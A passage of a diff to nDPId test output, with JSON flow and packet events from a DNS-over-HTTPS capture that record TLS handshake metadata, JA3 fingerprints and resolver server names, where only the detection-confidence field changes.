8Q7A+R1MIFZgfnWqkxiaXPHcpFh\/8pcgjckhLtTiSFgMDAAQOAAAA"} -01276{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"thread_ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}} +01276{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"thread_ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":946739311048,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":946739311048,"pkt":"REREREREZmZmZmZmCABFAACmYCJAAL0GXEYKAAABuSuHAZUqAburhClHMeSxCFAYAfUBggAAFgMDAEYQAABCQQS+L1tdhkv27psDloITDJmmm+nkuKGJ6kBYeGBEdwUOSK4polbbfA55gXHwNtK3Y1Aq1CUhl++X\/zqhOD+IGqi8FAMDAAEBFgMDACgAAAAAAAAAALayQyzNIxhtoOFefQYzbs\/rDW3NZGb\/HW2xO7qHfaVY"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739311335,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311335,"pkt":"REREREREZmZmZmZmCABFAAFF8W5AAL0G+HQKAAABCQkJCso6Abuxr7nkL4f0JVAYAfbUBgAAFgMBARgBAAEUAwN330DAziY7Qy75ow2vvPPweI0WjrfNmIygzjgDJAOaiiBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AICW+8u6SZcrHjrKSceEpWhhd\/sXKRaui0Qq2OMNRWOwf"} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946739311357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739311357,"pkt":"ZmZmZmZmRERERERECABFAAXUEqtAADsGVKoJCQkKCgAAAQG7yjovh\/Qlsa+7AVAQAHdneAAAFgMDAHoCAAB2AwPsHFeUVovCXmWpA4VyNoqF1JeqKqRwRROYqOPJU94DoSBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3hMCAAAuACsAAgMEADMAJAAdACBGm95D7Gx83XoeinRk1rxGpZA8u1buvy6HtAvs0UM2ZxQDAwABARcDAwAgBCGr5NOssVZ7TUX4BrL7MyB6aRLwiu1feUb2m7o8fLYXAwMKaD942IoOSpCliO6ZHVfN+ruurWUvz7jYgeJjK7SV5aPdpOPU+gCK34wDZjZp50dMaIsg77NAx4MrmJU6wTsTAwZldztvUMpws2wEYMHKWN686r\/ZugmuzBYB3tOPhjCMvk8pBO5Z4lVJQc9Hb1RsJ03QnqO\/EjZsCDIJr3EwAdBfauIjY3hi6AzlRf9VL9JoUREwghpYtzQDH4RvKScS6ISuIZ0qtqLTaSpG1rQC+HJZ6KKhTxZKSTcym6aIqvAR7ZiyINnXnDnxtWbl8cRiOiDv8PdDsr+5E5xwhcf6QYoUCBscXYYl1EwqfCWZLU9EdSEHvyBTgkaNAt3XMqrEl7x4wjZ94SWxkiQsQ3IyHj5ooHHdJLNgfAhAZ1sF3MqWOMepm6yBmJwKpSpxHS0\/\/oYNPpH+52R4vidTCtKs7UfIN9SKrOu0JFbGVqc8M5lplCXOQx4+S48+BecP0sGtTkcShvyBVSAANiwxQTDnS7JinVgGYtRwWjEqrWQJJopko6YuGLn+wkhYZkogv\/onHZtE4hlsg01xAHJ9PxQYxWbOdVfS1w0JvhE5EDMILwTMYm\/YfzaRcfZnN3X3c8PldLUC8Q00rxaePA+7a5mbMlVzZ\/ZKqlpmGHRhU3G\/b+Za7F3XZpTKcWJ\/+pP4OAaUaey+j0NOSrl7D3\/HeWq7P0vSd\/KYIm9oS0ZJvLtsffCfxTm2zwDcPGhRfKW16iadTUvmoczzCHSYvw+n8hl61iMBIgJerq\/CN9KkicrNEfU8QCR9bMF1D3CABgNImMdCKODlAcrpb\/Ya\/cQUwfP\/CWuVsZ3s+sh12SEW9JLfAgHTnuYwcMjbvAf2Fgpb\/+WmXCT93+A3gLKANXIVA2PfvntvndGO4gXYEiHaUhu4qZSsHkkcQJ5rwvJrE4CSJC\/fp+te7FlAxBXZxU3peCLLIMzIhccFKuqNX9+cPYxqAzm+f4FDsJg5KvH5AIh6Nda\/JBKZzhlz2omWzUxsNRCyzYkCR\/6xx8emByUElOOQjp3\/HRm+WaL5aZHnOk2myD86PdWR0IdZibdlJEHJ2\/GXJsQQv95dhA35hvgjWHiQLe0QLkAtPzosLXULXc5d7ytqMATetgFrOl+B+IuaEJAtm5NdT9m+\/Uo1nl\/TbvSaNp5EaxK2DPhV7Vt+vxmsBj23m0aDhv8PPgUfy9wK\/Niqob3bOD6oQrofsTggzpDg\/0PeQx+LRnGU46v4ljhYI4JoQY+cJBFQKWNeFww9uy1s8SJhz9LzcLFv+j30Vt+r4FFm8AZfzHX3wSuBELuShY7dZHSjQzxqOJfeGLr5ThoXw5ldv54ifSY52Lfxp8BkElu7BDDbf4F6XdVR3aRKy8Yk7ooQevFc0GOsxn7jXeMuFiaf9M\/MspabzWIKD5sTaMPvexVqQrSIhAE01MVqTa8zAs1n4D9AszPAZaArvvaw1dpUAGCn22YGrLkylRxMCN07\/HyOXir6cpxUbsvRgSag8LgIuYbY\/Ta1KZ2trDeXprvYofOqOqX\/ep4LHzQHiCFm14LvDzSoMa4qqUdxfJfOjiZQVsJdT+2uThs188toZRMoZsziXxP++fZpO4m\/wGTJ13ciJYHkQjnaWtFJW9KHR4pPyXX3T1W5XcomUZpNi+tnQlSKiXPl02KPyhw0qdY8Z0WoKV536f3wtH00HuTa3UIk1hZxDmxFcYOKvSwc"} -00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946739311358,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1616,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1616,"pkt_l4_len":1582,"thread_ts_msec":946739311358,"pkt":"ZmZmZmZmRERERERECABFAAZCEqxAADsGVDsJCQkKCgAAAQG7yjovh\/nRsa+7AVAYAHfZAwAA1xiWPE9sRZ+HRED66TQP2BK\/H\/\/55yXpchOqptSfdmizDwWdekTWC4fynK8Z2sZPt7VLeiJJja8C3BQX9Rz0xZnn1eoThbbJA0Ru7pA+5J7tyanMo4IQcPUIBSO5p49Bymfzm29G5qjErMG7mQ0OPPjTCRaB\/UjgjbKvSEcd8\/qlBT71ZfI4uv2myCBr7kstCCXPIR18CKF+Z2\/VrH6vxRdx\/DMaAsMgc41PzNU7xNOukRDZxOR62YLQKe5TOm9eGAE6qQfGiWVQuBPTBNCMLbyMtxxnLWSXpHUM8lAFCuaK7Kc6QBacccBEf2G6WUxZTWFo3b0bLTLXGsaAdMgEEvX57cRGL6Gq8YWmgloFc0L4YPSBPg4QXqG2603cgV+j6PlTHv6e2HefSTdXdeLXiPRCN345+9Y7w0ERX6leOOccKhVG5SuGrnMow7zmCn7a2KZDo6IK6nPbbrDUtvAROe\/2qAE2VCX9KID9EijWEziQ9XCbVPjeL02DA\/rYN7wYXRiJgCIeBs3cXR7OygqBY2+3+XFzo9TaLSJOjL2D0foR73wSCVhYWptmpzwaIHjhZCo4rI5hdLdI5wijBOAwhmr7WRW8Yv8AQsnvt1Z4coLNvTRubKzb6tX\/Oxf2jOtE8ql46ReYSM8F\/WAKChrNRMIbb1FxJ7q10gZXMDttRcPXX\/qGmHUzaGCJmbtVGS68jgVwThCO60XMMu84lvsX\/Ppf9SgVkWGycwU0+7rBExjec94Gk2PRYtyBh7FtK\/ojKF2Zx1IbH4Ped7sLfGR4i7sMPLWNn+T5wJpId2IpurmzQEup+Wmo7GS+GCV0scp4nxOFT1awumcjwSZT8bYpF93Gq1VRsPaw1Ed8OHX5e5gmoY4MVzie+NT9SEgMn6ichQsu5snHAMbc8\/IWQxw1j4WN38V6zcIh4u4V1Gd7SkhAHeYNQaHO8zyvvE8ImQNU3iYNHLIKvw9jrqWUBqp23GQnf3jir7+jnbT6O6iTPLexjWoZTCF\/FtolEJ0e895tZWyhQDvFKtQE5PBsOvi7\/BalOF7pvRKDn\/re0ni0oWgQPdEaU+LIaPzCC8LkWYd5oE27150iJxzh1Gp8SiKQXDLhLhi579hHj1+ols2JqJH8RdJfR0+VmnJeuW7LLf+BRMSJBXoQCCLgwxC7f\/h7fFu2xKC0W6c42fJZaQRckgm7zcULCvbrdB3\/7TiSzFX4IqscHoIIazQksB3SnhTuJmLtEq0s5iQGUGxfhlMGhmMgzukQ6S3xziGVGLlkCIIbeLTBQrX9TXDN8S1GsZEFqBjMPt\/N1zN3ViQ2J2at2dPSgSFskYDCKI7W279fwmbZs7V8tsMKdl7zI9bVkSm8TK+VOCU7uRHndZTCFD0rVG1nulq\/L99PnlHGAGXK\/CqGETUVVLlDxaOxEAgpjONuItzxylFN2ddXgvj3hTCiDE8O0ZeY5HxF3kaLieLFjiKlcFdLwH+yoWIasdZ5ETRJVqr26OzVYBTCPTfSgbwHD0EdFC3v31MUjg04ocQ4ZiFf7dRFVtWmOWN0r2SpHXy2xEBvMuqeP3vQyXuuz6g6Dn7YZmJY0+sx4Fy9C8oBJAE0ZwKxguZmJv1GeQHP6tU\/veMnBxdJr3tx5OgYDk+909nj4a5TD3cRR1pqKY8PwvBnQ1a7o21Mx6az\/nj775\/EQh2soovj6zthqPP\/vtXFBBG3tG\/sEPeFuYX44cpRhz5K3N4JqP6Lp6W3KZYJ1EwmXdPWiQcbK\/K0dzC4LCmApJnMsipnxLFAxIsyZnv1pRKdZtp6E4ZNkwItTRiePKudtegvLH1+qbg3pXvAj\/AueIMUCY+nZ2bEiLI67RcDAwBgsXSJyFgjJRWpsUIwFa+B3HudQHKrExr60U8JLlKkL\/P\/S+PEy7whFdA90+7WJF1F8DCmOjyvxxrrWdZx35m5pHvRkiSavCeWDYlRzcWBeiUF0TAz0e0CdFpMI0nfm+C5FwMDAEXIcqRX1+3I4YBN1ZyTwBh\/\/IzIU5lJHrJKAnGrUu2ocpCQI2eEwS+zVK0zKk1o2WUWMhhsV2wCrUmzne3qZHF1rWYeRVk="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739311566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311566,"pkt":"REREREREZmZmZmZmCABFAAFFTLFAAL0GMYcKAAABuYbEN9gaAbsU0wRrjALq7FAYAfY\/sgAAFgMBARgBAAEUAwN53D+IdbyKMqUcdChlG3BH1byG6PSts1pdzll38jdueyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIASid2tq+mdmASZBUTGU5iyt2F1JUvrNCp22BxrDleoO"} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946739311603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311603,"pkt":"ZmZmZmZmRERERERECABFAAuAg39AADQGeX65hsQ3CgAAAQG72BqMAursFNMFiFAQAfVJ7QAAFgMDAHoCAAB2AwNkY5ffptLk\/1RQxoHPHysW3r9+0ddQo4Z3YjqxuStqKyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhxMCAAAuACsAAgMEADMAJAAdACDs3oZu6oN3lGaq4ly6\/hAqFwB\/djty35eYhaI2Lxe7SRQDAwABARcDAwAgv82VBnjlaTkDEuDhSukFo4HH4nI6fax\/zFPW2XozJ0kXAwMOr9L3WKPFCRevhqaVGoGS+x\/kXxxMckfNoOqk04UOi2nffzkls4dz\/6PwTgD2O+tiYezNJxr\/6WpHVX82B1TCh5LVuQtfmobZqrhUuztxfuDnZpjdtqBFN8\/ThU4OUKCLhdBohaEJUJaODtpSPbvHLMo+XUoovzoT0\/zM8eQTXQpCXzBBMJx7xHTAsbkvGn3C+AG5zWAlrqlt8rw8cJvpcKk420r2AjCbqQCcOhIk9fgtrE6sGQpDmvb1eDYkMJL0ZWhtJpArnw4DJbVlN2eqshODC2oEeU4LRs6HxumiPK1q9BAYm9j4B\/VQvljlxD1l2D54nI0XTtCqzYVH05VeNSyKwY99P0gfk5KbNuwMkg76KjoZ0pANDmDoK2O7MRcalHkbOzBtmCZzhD7k0YW7eqNkMU5wTjhw6\/SKqF25gZNB9Nt6RXkKo6zhp67SL4jpzGRuSRzfeNfXwE70s6GkDEHT87ePp0CPZwkccES0koYuFCUJ8ZPaF51CsuO3hEK6HLj90BijpqZSqxhfc1mm\/yqD3lLZlsT6EnUdCBK75PQ4LqFtNj1aZVWZmY0bISdBsjTgcU\/azUhlVpbtuwFzbRgeZMjYItDFV3G2Mz1lBTIG8+EI15TAfiX3THktTEDNdXWRIKZWc6CdSZSTQj5epKSMIDeZ3ym23Y5D0uYv2rRWwF77WpaBXG+MUxbpeWleGLZxmojsUrhsTN3K\/SO4YTnIH3mEDcbuEL\/C6kXZUUc3JKUkSmGmNO61dgMehbma4fB8llee+ia3ZxrMWwvGiTS2tpm78Rjdk2lVGQ4Kw0Hv16lr+xG8BLc4CMV63wU9gsM8SvlR14rXUIcZ1w1IVKRMCPj5\/ktzqCSdsd7JLAu6iqnF+tffAp0R7hABno4kl79WtkvKmhCxs2C9rHaxhWuglRBec9Q1dOU4n\/q5s3oTaT0MWOiB9FA9hPVkcr5rHO5WTaUTZCO3f07agWWupUC0SrT4kMq2F7GC\/qyJUokz54psYmDyksoYU5W4XunHAPWif32UI8qTU8ZnD9BGfH74hn454rDYVO6L7CccMxZlmp851erV6hvxeQE4QFic5+4T+9IQsqcHez2OFejw6vdevdAwPVqE+KjL4UP+MGf4lbUn4WzekrRNg4+OLWhqMW5jPxgVFLL1X\/7LXlyiUW3FZsQlx3wHUnrfnXgRsgIdVSezz4HY0222o0JjMjRIsMAML27omWMbFkL1GH9F5whlSmkQo7tR4pkO8ZObYU6gN63eRur2pr9yUb6mdaHxKmoMOtTc07t4c0mmYRPcKvUuGEq\/qFZAib\/Cn9qtJSED+KsOJFP3lcOvHyBWmDkPTuXhIirjxvNRHlhpCinnvq51BRLv0iIYtLa4+FWzOnZxdtRmb+J7gXcYqMUZr8f9hSbjcXpRs0qTCNkn\/vEFebnj0Oa5wWQ\/wyYqcIXbH0+Qg2t4MHCtt5puUCcnWiddPmXVCEbusxDhj1mW7Wb7s7TbeMJNHqJK2wkpexuwL1VqKOcMpKkVK63qTpeBRS7pKr42\/e4RAue3aCNMwXb2qN+nhV\/yAs+no2\/T8CA38S+A3XjJrTp3nRj3b7uYGTvq6vgcySIveyFsNVxbpOrMNJwA55r7OmJm\/TMMYu1Cmm7ApgsYESAyvVbBcTmlsCXf4kc5\/PCSNGVGXc3ry7HZ6UrNLiBxVinlqk+M5YS+nDMxRpBRZ\/l5jocQH\/hTpYeDeBYM6nlOI3a42ojQOf0qu\/s3tJK0pVMQq+L3fiObQL0w0ki8zB\/Pq94eJzcgGDCpDBI5rSkrXqKSKwE\/TPxGGb4EW3iPF5GMaLLk69BANjmbdOWrRbmSOZIerFLKML4S4ISArr9z\/Hd6jn9grfPQF5QPRgsy72snzNYK+cdD78EVK3JLSsYYqn88MbAXaWnvt\/NrtPJL0QXd+HGti75Czr60Z2exrtdLfvuyhP6EA\/OJF74UO1DMZkdkO4dBy70z4Gu4gpkQ7cqPDY0GZ19ZQkhDdIe6tY\/KPM4UldVfU5Ox+v3aicLwXXKsL1aYiIDMExLQqDr8Vp6Rg8MhQd15RVUWWezyYpN93w5RckR2WthYnNZNsPa7iVvEbmCiUoUkbzt39o4APEG2T8nb60w4QPGzL8Bs+6zqpdT6PPZQOoSFcrit36uSRZP8iGT1fW72Vs+Zxy5GcZuta5oSW5oky8Ru7NnhXKgfldlxRBIOjtCyzFizIawHPWtdb1FNijZyZVKdj4BP0ocR0b5RYPeWT1DhR9qwqhFmLRHqWhBkA5vK7BpYSEPmeNp9JvF8mc9PzqPXFx4qv46sa0RB9Om1TkSniqOmaKfC0VJ55FKEd3mCSVa1mQ2nzlNyLUC\/G6NFqNfA87dMc8kmjkPDW9L4TPuUdk6cFk2SWFMlOT4UEAqyKhiuK9S2TSwt8uFOPCTdi2gCXoEJdX+9z6vM3zP1D618aG60X5Ut6n4\/mqqX3ZYS740az2d1czqYB7kjzMa99L4RSKw9Nv7MMuwMNSxkhAXISg5MWpacHw\/KAdEQ1nUyITpRoICmtn4wFkGI6VHWSC4OZg5gMWs1Z3587N6CIw3eN5rLnfYJ5l6ZBNqLnr+ciVip8x2IDHWDGTGr5OC+uJxAOEMiK+fcS0il3LgKzbRTF6C8+Y0IWjT3NlBZzIZBcCE3FjrijIv+69vNs6VJAKOlSW3f43x0FPmVvFyGHd0hZ6go7pV\/2O1uABkUwtp9Jfvr8prX7E0NzIH8AuTCtktrwjOAvCJu4CHVfpkaygbTIxPH5m45oyD64MuKPbsc5SlgZwhfZunmTwVDMaVpXGfayrmusZgZ\/07zHxvKOvoAfTCZXoYameOeAqJlNLuCW2W26TogT5fb\/9WF1j5kVLVJW3+Xr3WsDu87Z6wA7xpdVjSQWvWXCJ9y6jEXbNwmvXmeHALYBp+DdvlGU6uIsmqv2tJETpbTRkgR+f7Dhm8aD8084eT\/a67jbRGqTJcyCWp8HFxcSFdtdPKZoErFiYrC7xPgwqW36MeKC3pPi5nT9yuHbuL7yiKV4x9J1dD